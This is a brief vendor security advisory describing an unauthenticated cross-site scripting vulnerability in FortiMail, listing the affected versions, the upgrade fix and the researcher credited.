PSIRT Advisories

Unauthenticated XSS (Cross Site Scripting) in FortiMail

Summary

An unauthenticated XSS vulnerability could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in FortiMail, assuming the victim is social engineered into clicking an URL crafted by the attacker.

description-logo Description

An unauthenticated XSS vulnerability could allow an attacker to execute arbitrary scripts in the security context of the browser of a victim logged in FortiMail, assuming the victim is social engineered into clicking an URL crafted by the attacker.

Affected Products

FortiMail 

5.0.0 -> 5.2.9,

5.3.0 -> 5.3.8

Solutions

Upgrade to FortiMail 5.3.9

Acknowledgement

Fortinet is pleased to thank Ebrahim Hegazy for reporting this vulnerability under responsible disclosure.